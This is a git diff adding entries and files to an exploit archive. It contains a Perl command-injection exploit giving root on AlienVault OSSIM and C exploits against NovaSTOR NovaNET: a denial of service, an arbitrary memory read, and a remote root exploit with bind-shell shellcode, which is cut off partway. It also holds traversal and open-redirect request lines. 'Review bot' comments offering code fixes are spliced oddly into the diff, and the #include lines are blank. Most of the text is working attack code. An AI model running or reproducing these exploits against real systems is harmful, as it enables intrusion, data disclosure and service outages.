diff --git a/files.csv b/files.csv
index 279e0eb07..f5dc3ef6c 100755
--- a/files.csv
+++ b/files.csv
@@ -30455,6 +30455,7 @@ id,file,description,date,author,platform,type,port
 33802,platforms/multiple/remote/33802.txt,"Jenkins Software RakNet 3.72 - Remote Integer Underflow Vulnerability",2010-03-25,"Luigi Auriemma",multiple,remote,0
 33803,platforms/hardware/webapps/33803.txt,"ZTE WXV10 W300 - Multiple Vulnerabilities",2014-06-18,"Osanda Malith",hardware,webapps,0
 33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0
+33805,platforms/linux/remote/33805.pl,"AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",linux,remote,0
 33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888
 33808,platforms/linux/local/33808.c,"docker 0.11 VMM-container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
 33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0
@@ -30490,6 +30491,7 @@ id,file,description,date,author,platform,type,port
 33848,platforms/windows/remote/33848.py,"WinMount 3.3.401 ZIP File Remote Buffer Overflow Vulnerability",2010-04-19,lilf,windows,remote,0
 33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation NULL Pointer Denial Of Service Vulnerability",2014-06-13,"A reliable source",windows,dos,0
 33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 Memory Consumption Remote Denial of Service Vulnerability",2010-04-27,fallenpegasus,linux,dos,0
+33851,platforms/php/webapps/33851.txt,"Wordpress TimThumb 2.8.13 WebShot - Remote Code Execution (0-day)",2014-06-24,@u0x,php,webapps,0
 33852,platforms/windows/remote/33852.txt,"HTTP 1.1 GET Request Directory Traversal Vulnerability",2010-06-20,chr1x,windows,remote,0
 33853,platforms/php/webapps/33853.txt,"Kleophatra CMS 0.1.1 'module' Parameter Cross Site Scripting Vulnerability",2010-04-19,anT!-Tr0J4n,php,webapps,0
 33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module 'externalredirect.php' Cross-Site Scripting Vulnerability",2010-04-20,"Edgard Chammas",php,webapps,0
@@ -30502,3 +30504,14 @@ id,file,description,date,author,platform,type,port
 33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,metasploit,hardware,remote,80
 33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,metasploit,linux,remote,40007
 33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0
+33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure Vulnerability",2010-04-22,"Veerendra G.G",multiple,remote,0
+33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 'id' Parameter Cross Site Scripting Vulnerability",2010-04-22,Valentin,php,webapps,0
+33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 Multiple Input Validation Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0
+33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage 'RedirectUrl' Parameter URI Redirection Vulnerability",2010-04-25,"Aung Khant",multiple,remote,0
+33874,platforms/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 Multiple Security Vulnerabilities",2010-04-26,"Richard Moore",php,webapps,0
+33875,platforms/php/webapps/33875.txt,"HuronCMS 'index.php' Multiple SQL Injection Vulnerabilities",2010-03-30,mat,php,webapps,0
+33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 remote DoS and arbitrary memory read",2007-09-14,mu-b,multiple,dos,0
+33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET <= 12.0 remote root exploit",2007-09-25,mu-b,multiple,remote,0
+33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET <= 12.0 remote SYSTEM exploit",2007-09-25,mu-b,multiple,remote,0
+33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP <= 13.0 remote DoS",2007-10-02,mu-b,multiple,dos,0
+33880,platforms/windows/remote/33880.rb,"Cogent DataHub Command Injection",2014-06-25,metasploit,windows,remote,0
diff --git a/platforms/linux/remote/33805.pl b/platforms/linux/remote/33805.pl
new file mode 100755
index 000000000..3f5266ffc
--- /dev/null
+++ b/platforms/linux/remote/33805.pl
@@ -0,0 +1,29 @@
+# Exploit Title: AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution
+# Date: 06/17/2014
+# Exploit Author: Alfredo Ramirez
+# Vendor Homepage: http://www.alienvault.com/
+# Software Link: http://www.alienvault.com/open-threat-exchange/projects
+# Version: < 4.7.0
+# Tested on: Debian/Virtual Appliance
+# CVE : CVE-2014-3805
+
+ #!perl -w
+
+ use SOAP::Lite;
+
+ # SSL is self-signed so we have to ignore verification.
+ $ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;
+
+ # We simply append the 'id' command to the number of log we want to
+ # read.
+ @soap_response = SOAP::Lite
+ -> uri('AV/CC/Util')
+ -> proxy('https://172.26.22.2:40007/av-centerd')
+ -> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')
+ -> result;
+
+ for (@{ $soap_response[0] }) {
+ print "$_\n";
+ }
+
+ # If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)
diff --git a/platforms/multiple/dos/33876.c b/platforms/multiple/dos/33876.c
new file mode 100755
index 000000000..9d23e54b8
--- /dev/null
+++ b/platforms/multiple/dos/33876.c
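Review bot: The `#!perl -w` line sits after the eight header comment lines and a blank line, so it is an ordinary comment rather than a shebang: `-w` never takes effect, and with no `use strict;` the script also leaves `@soap_response` an undeclared package global. Move the shebang to line 1 (or drop it) and add `use strict; use warnings;` with `my @soap_response = ...`. The comment above `$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;` could also state that this disables hostname verification for every LWP request in the process, so the operator's own TLS session to the appliance is unauthenticated for the run; a checked-in PoC should say that explicitly rather than only "ignore verification".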
@@ -0,0 +1,180 @@ +source: http://www.securityfocus.com/bid/39693/info + +NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities. + +An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users. Successful attacks may result in the complete compromise of an affected computer. + +NovaNET 11 and 12 are vulnerable to all of these issue; NovaBACKUP Network 13 is affected by a denial-of-service vulnerability. + +/* novanet-read.c + * + * Copyright (c) 2007 by + * + * NovaSTOR NovaNET remote DoS + arbitrary memory read + * by mu-b - Fri Sep 14 2007 + * + * - Tested on: NovaSTOR NovaNET 11.0 + * + * Note: this was silently fixed in NovaBACKUP NETWORK 13.0 + * + * - Private Source Code -DO NOT DISTRIBUTE - + * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! + */ + +#include +#include + +#include +#include +#include +#include + +#define BUF_SIZE 0x92 + +#define NOVANET_INT_IDX 32 +#define NOVANET_OFFSET 0x100EC480 +#define NOVANET_CALC_INT(a) (((int) (a)-NOVANET_OFFSET-16)/sizeof (int)) +#define NOVANET_SET_INT(a,b) *((unsigned int *) &a[NOVANET_INT_IDX]) = b; +#define NOVANET_TCP_PORT 3817 +#define USLEEP_TIME 100000 + +static int +sock_send (int fd, char *src, int len) +{ + int n; + if ((n = send (fd, src, len, 0)) < 0) + { + perror ("send()"); + exit (EXIT_FAILURE); + } + + return (n); +} + +static int +sock_recv (int fd, char *dst, int len) +{ + return (recv (fd, dst, len, 0)); +} + +static int +sockami (char *host, int port) +{ + struct sockaddr_in address; + struct hostent *hp; + int fd; + + if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1) + { + perror ("socket()"); + exit (EXIT_FAILURE); + } + + if ((hp = gethostbyname (host)) == NULL) + { + perror ("gethostbyname()"); + exit (EXIT_FAILURE); + } + + memset (&address, 0, sizeof (address)); + memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); + 
address.sin_family = AF_INET; + address.sin_port = htons (port); + + if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0) + { + perror ("connect()"); + return (-1); + } + + return (fd); +} + +static void +novanet_pkt_init (char *pkt) +{ + char *ptr = pkt; + + /* add packet header */ + *ptr++ = 0x54; + *ptr++ = 0x84; + + /* add padding */ + memset (ptr, 0x00, 0x1E); + ptr += 0x1E; + + /* add our dodgy-int */ + memset (ptr, 0x69, sizeof (int)); + ptr += sizeof (int); + + memset (ptr, 0x00, BUF_SIZE-(ptr-pkt)); +} + +static void +novanet_read (char *host, void *start, void *end, int is_dos) +{ + int sock, i, num_hits; + char buf[BUF_SIZE], rbuf[BUF_SIZE]; + + novanet_pkt_init (buf); + + start = (void *) NOVANET_CALC_INT (start); + end = (void *) NOVANET_CALC_INT (end); + + if (!is_dos) + printf ("start: %p end: %p\n", start, end); + + num_hits = is_dos ? 1 : (end - start); + printf ("+hitting %s:%d. (%d times)\n", host, NOVANET_TCP_PORT, num_hits); + + for (i = 0; i < num_hits; i++, start++) + { + sock = sockami (host, NOVANET_TCP_PORT); + if (sock == -1) + break; + + NOVANET_SET_INT (buf, (is_dos ? 
NOVANET_CALC_INT (0xdeadbeef) : (unsigned int) start)); + sock_send (sock, buf, sizeof buf); + + if (!is_dos) + { + sock_recv (sock, rbuf, sizeof rbuf); + write (fileno (stderr), &rbuf[NOVANET_INT_IDX], sizeof (int)); + usleep (USLEEP_TIME); + close (sock); + + if (!((i + 1) % 8)) + printf ("..%d", i + 1); + + fflush (stdout); + } + } + + printf ("\n"); +} + +int +main (int argc, char **argv) +{ + void *start, *end; + + printf ("NovaSTOR NovaNET remote DoS + arbitrary memory read\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); + + if ((argc % 2) == 1 || + (argc > 3 && (sscanf (argv[2], "0x%p", &start) != 1 || + sscanf (argv[3], "0x%p", &end) != 1))) + { + fprintf (stderr, "Usage: %s [[start] [end]]\n" + "Note: not specifying [[start] [end]] results in DoS!\n\n", argv[0]); + exit (EXIT_SUCCESS); + } + + if (argc > 3) + printf ("dumping from: %p -> %p (%d-bytes) to stderr\n", start, end, (int) (end - start)); + + novanet_read (argv[1], start, end, !(argc > 3)); + + return (EXIT_SUCCESS); +} diff --git a/platforms/multiple/dos/33879.c b/platforms/multiple/dos/33879.c new file mode 100755 index 000000000..51110590f --- /dev/null +++ b/platforms/multiple/dos/33879.c 
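Review bot: `sock_recv` returns the raw `recv()` result and the `!is_dos` branch of `novanet_read` discards it, so when the read fails or returns fewer than 36 bytes the following `write (fileno (stderr), &rbuf[NOVANET_INT_IDX], sizeof (int))` emits four uninitialized bytes of the local `rbuf` as if they were part of a reply; anyone validating a finding from this output cannot tell the two cases apart. The sibling 33879.c in this commit already checks the result (`if ((n = recv (fd, dst, len, 0)) < 0) { ... exit (EXIT_FAILURE); }`), and here the caller should additionally capture and test it, e.g. `if ((n = sock_recv (sock, rbuf, sizeof rbuf)) >= NOVANET_INT_IDX + (int) sizeof (int))` before the `write`. The preceding `sock_send` has the same gap, since it only rejects a negative return and never compares `n` with `len`.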
@@ -0,0 +1,191 @@ +source: http://www.securityfocus.com/bid/39693/info + +NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities. + +An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users. Successful attacks may result in the complete compromise of an affected computer. + +NovaNET 11 and 12 are vulnerable to all of these issue; NovaBACKUP Network 13 is affected by a denial-of-service vulnerability. + +/* novanet-dos.c + * + * Copyright (c) 2007 by + * + * NovaSTOR NovaNET/NovaBACKUP <= 13.0 remote DoS + * by mu-b - Tue Oct 2 2007 + * + * - Tested on: NovaSTOR NovaNET 11.0(SP*) + * NovaSTOR NovaNET 12.0(SP*) + * NovaSTOR NovaNET 13.0 + * + * - Private Source Code -DO NOT DISTRIBUTE - + * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! + */ + +#include +#include + +#include +#include +#include +#include +#include +#include + +#define NOVANET_HDR_SZ 0x14 +#define NOVANET_PKT_SZ 0x92 +#define NOVANET_MAX_LEN 0x112014 + +#define NOVANET_TCP_PORT 3817 +#define USLEEP_TIME 100000 + +static char hdr_pkt[] = + "\x54\x84\x00\x00" /* 04 */ + "\x00\x00\x00\x00" /* 08 */ + "\x04\x00\x00\x00" /* 0C */ + "\x92\x00\x00\x00" /* 10 */ + "\x00\x00\x00\x00" /* 14 */ + "\x00\x00\x00\x00\x00\x00\x00\x00" /* 08 */ /* 1C */ + "\x00\x00\x00\x00\x00\x00\x00\x00" /* 10 */ /* 24 */ + "\x00\x00\x00\x00\x00\x00\x00\x00" /* 18 */ /* 2C */ + "\x00\x00\x00\x00\x00\x00\x00\x00" /* 20 */ /* 34 */ + "\x00\x00\x00\x00\x00\x00\x00\x00" /* 28 */ /* 3C */ + "\x00\x00\x00\x00\x00\x00\x00\x00" /* 30 */ /* 44 */ + "\x00\x00\x00\x00\x00\x00\x00\x00" /* 38 */ /* 4C */ + "\x00\x00\x00\x00\x00\x00\x00\x00" /* 40 */ /* 54 */ + "\x00\x00\x00\x00\x00\x00\x00\x00" /* 48 */ /* 5C */ + "\x00\x00\x00\x00\x00\x00\x00\x00" /* 50 */ /* 64 */ + "\x00\x00\x00\x00\x00\x00\x00\x00" /* 58 */ /* 6C */ + "\x00\x00\x00\x00\x00\x00\x00\x00" /* 60 */ /* 74 */ + 
"\x00\x00\x00\x00\x00\x00\x00\x00" /* 68 */ /* 7C */ + "\x00\x00\x00\x00\x00\x00\x00\x00" /* 70 */ /* 84 */ + "\x00\x00\x00\x00\x00\x00\x00\x00" /* 78 */ /* 8C */ + "\x00\x00\x00\x00\x00\x00"; /* 7E */ /* 92 */ + +static char rem_pkt[] = + "\x51\x84\x00\x00" /* 04 */ + "\x00\x00\x00\x30" /* 08 */ + "\x05\x00\x00\x00" /* 0C */ + "\x00\x00\x00\x00" /* 10 */ + "\x00\x00\x00\x00"; /* 14 */ + +static int +sock_send (int fd, char *src, int len) +{ + int n; + if ((n = send (fd, src, len, 0)) < 0) + { + fprintf (stderr, "sock_send: send() - %s\n", strerror (errno)); + exit (EXIT_FAILURE); + } + + return (n); +} + +static int +sock_recv (int fd, char *dst, int len) +{ + int n; + if ((n = recv (fd, dst, len, 0)) < 0) + { + fprintf (stderr, "sock_recv: recv() - %s\n", strerror (errno)); + exit (EXIT_FAILURE); + } + + return (n); +} + +static int +sockami (char *host, int port) +{ + struct sockaddr_in address; + struct hostent *hp; + int fd; + + if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1) + { + fprintf (stderr, "sockami: socket() - %s\n", strerror (errno)); + exit (EXIT_FAILURE); + } + + if ((hp = gethostbyname (host)) == NULL) + { + fprintf (stderr, "sockami: gethostbyname() - %s\n", strerror (errno)); + exit (EXIT_FAILURE); + } + + memset (&address, 0, sizeof (address)); + memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); + address.sin_family = AF_INET; + address.sin_port = htons (port); + + if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0) + { + fprintf (stderr, "sockami: connect() - %s\n", strerror (errno)); + return (-1); + } + + return (fd); +} + +int +main (int argc, char **argv) +{ + char rbuf_pkt[NOVANET_PKT_SZ]; + unsigned int rlen; + int fd, n; + + printf ("NovaSTOR NovaNET remote DoS\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); + + if (argc < 2) + { + fprintf (stderr, "Usage: %s \n", argv[0]); + exit (EXIT_SUCCESS); + } + + fd = sockami (argv[1], NOVANET_TCP_PORT); + if (fd == -1) + { + fprintf 
(stderr, "main: sockami failed\n"); + exit (EXIT_FAILURE); + } + + printf ("* connected to %s:%d\n", argv[1], NOVANET_TCP_PORT); + + printf ("** sending header packet..."); + if ((n = sock_send (fd, hdr_pkt, sizeof hdr_pkt - 1)) != NOVANET_PKT_SZ) + { + fprintf (stderr, "main: sock_send returned %d (!= %d)\n", + n, NOVANET_PKT_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + printf ("** reading first reply..."); + if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ) + { + fprintf (stderr, "main: sock_recv returned %d (!= %d)\n", + n, NOVANET_PKT_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + srand (time (NULL)); + rlen = NOVANET_MAX_LEN + (rand () % (UINT_MAX - NOVANET_MAX_LEN)) + 1; + *(unsigned int *) &rem_pkt[12] = rlen; + + printf ("** sending smash packet [remaining length %u-bytes]...", rlen); + if ((n = sock_send (fd, rem_pkt, sizeof rem_pkt - 1)) != NOVANET_HDR_SZ) + { + fprintf (stderr, "main: sock_send returned %d (!= %d)\n", + n, NOVANET_HDR_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + usleep (USLEEP_TIME); + close (fd); + + return (EXIT_SUCCESS); +} diff --git a/platforms/multiple/remote/33868.txt b/platforms/multiple/remote/33868.txt new file mode 100755 index 000000000..ce9cc8851 --- /dev/null +++ b/platforms/multiple/remote/33868.txt 
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/39636/info
+
+Apache ActiveMQ is prone to a vulnerability that lets attackers access source code because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable computer in the context of the webserver process. Information obtained may aid in further attacks.
+
+Apache ActiveMQ 5.3.1 and prior are vulnerable.
+
+NOTE: This vulnerability may be related to BID 27117 (Jetty Double Slash URI Information Disclosure Vulnerability).
+
+http://www.example.com:8161//admin/index.jsp
+http://www.example.com:8161//admin/queues.jsp
+http://www.example.com:8161//admin/topics.jsp
diff --git a/platforms/multiple/remote/33871.txt b/platforms/multiple/remote/33871.txt
new file mode 100755
index 000000000..2691298ab
--- /dev/null
+++ b/platforms/multiple/remote/33871.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/39666/info
+
+Tiny Java Web Server is prone to multiple input-validation vulnerabilities because it fails to adequately sanitize user-supplied input. These vulnerabilities include a directory-traversal vulnerability, an open-redirection vulnerability, and a source code information-disclosure vulnerability.
+
+Exploiting these issues can allow an attacker to retrieve arbitrary local files and view directories within the context of the webserver. Information harvested may aid in launching further attacks. A successful exploit may aid in phishing attacks; other attacks may also be possible.
+
+Tiny Java Web Server 1.71 is vulnerable; other versions may also be affected.
+
+get /%00 HTTP/1.1\r\nHost: digitalwhisper.co.il\r\n\r\n
+GET /demo-servlets/%2fWEB-INF/config/mishka.properties HTTP/1.1
\ No newline at end of file
diff --git a/platforms/multiple/remote/33873.txt b/platforms/multiple/remote/33873.txt
new file mode 100755
index 000000000..8fecebd71
--- /dev/null
+++ b/platforms/multiple/remote/33873.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/39676/info
+
+HP System Management Homepage is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks; other attacks are possible.
+
+http://www.example.com/red2301.html?RedirectUrl=evil () attacker com
\ No newline at end of file
diff --git a/platforms/multiple/remote/33877.c b/platforms/multiple/remote/33877.c
new file mode 100755
index 000000000..1f079c0b6
--- /dev/null
+++ b/platforms/multiple/remote/33877.c
@@ -0,0 +1,386 @@ +source: http://www.securityfocus.com/bid/39693/info + +NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities. + +An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users. Successful attacks may result in the complete compromise of an affected computer. + +NovaNET 11 and 12 are vulnerable to all of these issue; NovaBACKUP Network 13 is affected by a denial-of-service vulnerability. + +/* novanet-own-lnx.c + * + * Copyright (c) 2007 by + * + * NovaSTOR NovaNET <= 12.0 remote root exploit + * by mu-b - Tue Sep 25 2007 + * + * - Tested on: NovaSTOR NovaNET 11.0 (lnx) + * + * Note: this was silently fixed in NovaBACKUP NETWORK 13.0 + * + * - Private Source Code -DO NOT DISTRIBUTE - + * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! + */ + +#include +#include + +#include +#include +#include +#include +#include + +#define NOVANET_POPRET 0x8048eea /* pop %exx + * ret + */ + +/* packet structure defines */ +#define NOVANET_HDR_SZ 0x14 +#define NOVANET_PKT_SZ 0x92 +#define NOVANET_DOMAIN_SZ 0x1F +#define NOVANET_BUF_SZ 0x400 + +#define PORT_SHELL 10000 +#define NOVANET_TCP_PORT 3817 +#define USLEEP_TIME 100000 + +static char getdomain_buf[] = + "\x54\x84\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x92\x00\x00\x00" + "\xff\xff\xff\xff\x08\x40\x80\x00\x16\xaa\x11\x02\x4c\x84\xf4\x01" + "\x01\x00\x00\x00\xc0\xa8\x01\xbc\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00" "digit-labs!$" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00" "Sup: Get Domain Address" + "\x00\x00\xff\xff\x00\x00\x06\x10"; + +static char ack_buf[] = + "\x51\x84\x00\x00\x00\x00\x00\x30" + "\x05\x00\x00\x00" + "\x18\x00\x00\x00" /* remaining length */ + 
"\x00\x00\x00\x00" + "\x01\x00\x00\x00"; + +static char hup_buf[] = + "\x56\x84\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00" + "\x14\x00\x00\x00" /* remaining length */ + "\x00\x00\x00\x00"; + +static char login_buf[] = + "\x54\x84\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x92\x00\x00\x00" + "\xff\xff\xff\xff\x09\x20\x80\x00\xcb\x14\x4C\x02\x41\xda\x2e\x02" + "\x01\x00\x00\x00\xc0\xa8\x01\xbc\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69" + "\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69" + "\x69\x69\x69" "Dtb: Context" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\xff\xff\x00\x00\x00\x00"; + +static char rem_buf[] = + "\x51\x84\x00\x00\x02\x02\x02\x32" + "\x18\x00\x00\x00" + "\x00\x00\x00\x00" /* remaining length */ + "\x00\x00\x00\x00"; + +static char lnx_x86_bind[] = + "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x12" + "\x76\xfc\x7d\x83\xeb\xfc\xe2\xf4\x23\xad\xaf\x3e\x41\x1c\xfe\x17" + "\x74\x2e\x65\xf4\xf3\xbb\x7c\xeb\x51\x24\x9a\x15\x35\x66\x9a\x2e" + "\x9b\x97\x96\x1b\x4a\x26\xad\x2b\x9b\x97\x31\xfd\xa2\x10\x2d\x9e" + "\xdf\xf6\xae\x2f\x44\x35\x75\x9c\xa2\x10\x31\xfd\x81\x1c\xfe\x24" + "\xa2\x49\x31\xfd\x5b\x0f\x05\xcd\x19\x24\x94\x52\x3d\x05\x94\x15" + "\x3d\x14\x95\x13\x9b\x95\xae\x2e\x9b\x97\x31\xfd"; + +static int +sock_send (int fd, char *src, int len) +{ + int n; + if ((n = send (fd, src, len, 0)) < 0) + { + fprintf (stderr, "sock_send: send() - %s\n", strerror (errno)); + exit (EXIT_FAILURE); + } + + return (n); +} + +static int +sock_recv (int fd, char *dst, int len) +{ + int n; + if ((n = recv (fd, dst, len, 0)) < 0) + { + fprintf (stderr, "sock_recv: recv() - %s\n", strerror (errno)); + exit (EXIT_FAILURE); + } + + return (n); +} + +static void +shellami (int fd) +{ + int n; + fd_set rset; + char rbuf[1024], 
*cmd = "id; uname -a; uptime\n"; + + sock_send (fd, cmd, strlen (cmd)); + + while (1) + { + FD_ZERO (&rset); + FD_SET (fd, &rset); + FD_SET (STDIN_FILENO, &rset); + + if (select (fd + 1, &rset, NULL, NULL, NULL) < 0) + { + fprintf (stderr, "shellami: select() - %s\n", strerror (errno)); + exit (EXIT_FAILURE); + } + + if (FD_ISSET (fd, &rset)) + { + if ((n = sock_recv (fd, rbuf, sizeof (rbuf) - 1)) <= 0) + { + fprintf (stderr, "shellami: connection closed by foreign host.\n"); + exit (EXIT_SUCCESS); + } + rbuf[n] = '\0'; + printf ("%s", rbuf); + fflush (stdout); + } + if (FD_ISSET (STDIN_FILENO, &rset)) + { + if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0) + { + rbuf[n] = '\0'; + sock_send (fd, rbuf, n); + } + } + } +} + +static int +sockami (char *host, int port) +{ + struct sockaddr_in address; + struct hostent *hp; + int fd; + + if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1) + { + fprintf (stderr, "sockami: socket() - %s\n", strerror (errno)); + exit (EXIT_FAILURE); + } + + if ((hp = gethostbyname (host)) == NULL) + { + fprintf (stderr, "sockami: gethostbyname() - %s\n", strerror (errno)); + exit (EXIT_FAILURE); + } + + memset (&address, 0, sizeof (address)); + memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); + address.sin_family = AF_INET; + address.sin_port = htons (port); + + if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0) + { + fprintf (stderr, "sockami: connect() - %s\n", strerror (errno)); + return (-1); + } + + return (fd); +} + +static void +novanet_get_domain (char *thost, char *d_name) +{ + char rbuf_hdr[NOVANET_HDR_SZ], rbuf_pkt[NOVANET_PKT_SZ], *pkt_ptr; + int fd, n, rlen; + + fd = sockami (thost, NOVANET_TCP_PORT); + if (fd == -1) + { + fprintf (stderr, "novanet_get_domain: sockami failed\n"); + exit (EXIT_FAILURE); + } + + printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT); + + printf ("** sending getdomain_buf packet..."); + if ((n = sock_send (fd, getdomain_buf, sizeof getdomain_buf - 1)) 
!= NOVANET_PKT_SZ) + { + fprintf (stderr, "novanet_get_domain: sock_send returned %d (!= %d)\n", + n, NOVANET_PKT_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + printf ("** reading first reply..."); + if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ) + { + fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n", + n, NOVANET_PKT_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + memcpy (d_name, &rbuf_pkt[0x54], NOVANET_DOMAIN_SZ); + printf ("** remote domain address: %.*s\n", NOVANET_DOMAIN_SZ, d_name); + + printf ("** sending ack packet..."); + if ((n = sock_send (fd, ack_buf, sizeof ack_buf - 1)) != NOVANET_HDR_SZ + 4) + { + fprintf (stderr, "novanet_get_domain: sock_send returned %d (!= %d)\n", + n, NOVANET_HDR_SZ + 4); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + printf ("** reading second reply..."); + if ((n = sock_recv (fd, rbuf_hdr, sizeof rbuf_hdr)) != NOVANET_HDR_SZ) + { + fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n", + n, NOVANET_HDR_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + rlen = *(unsigned int *) &rbuf_hdr[12]; + if (rlen < NOVANET_HDR_SZ) + { + fprintf (stderr, "novanet_get_domain: remaining length invalid (<%d)\n", + NOVANET_HDR_SZ); + exit (EXIT_FAILURE); + } + + rlen -= NOVANET_HDR_SZ; + printf ("** reading %d-remaining bytes...", rlen); + pkt_ptr = malloc (rlen * sizeof (char)); + + if ((n = sock_recv (fd, pkt_ptr, rlen)) != rlen) + { + fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n", + n, rlen); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + free (pkt_ptr); + + printf ("** sending hup packet..."); + if ((n = sock_send (fd, hup_buf, sizeof hup_buf - 1)) != NOVANET_HDR_SZ) + { + fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", + n, NOVANET_HDR_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n\n"); + + usleep (USLEEP_TIME); + close (fd); +} + +static void +novanet_own_process (char *thost, char 
